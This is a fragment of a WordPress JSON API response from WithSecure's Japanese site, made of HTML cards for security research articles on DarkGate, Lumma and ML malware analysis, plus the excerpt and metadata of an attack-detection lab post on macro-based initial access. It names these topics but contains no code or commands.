https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/darkgate-rises\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Reverse engineering a Lumma infection<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Lumma is an information stealer that the WithSecure Detection and Response Team (DRT) have encountered several times. It has seen wider use over the past couple of years, and makes for an interesting threat to monitor.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/reverse-engineering-a-lumma-infection\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Machine learning-driven malware analysis<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">With the rapid emergence of new malware variants, accurately classifying and attributing malware samples has become more challenging than ever<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/machine-learning-driven-malware-analysis\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In the first lab of this series, we are going to build and analyse a malicious Excel\/Word macro that uses PowerShell to establish a C2 channel. The aim of this simulation will be to highlight the importance of the parent-child process analysis.<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[314,345],"labs_content_type":[317],"class_list":["post-10591","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-network-security"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Network Security<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: Initial Access &#8211; Lab #1<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In the first lab of this series, we are going to build and analyse a malicious Excel\/Word macro that uses PowerShell to establish a C2 channel. The aim of this simulation will be to highlight the importance of the parent-child process analysis.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item\/10591","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/media?parent=10591"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/categories?post=10591"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/labs_content_type?post=10591"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}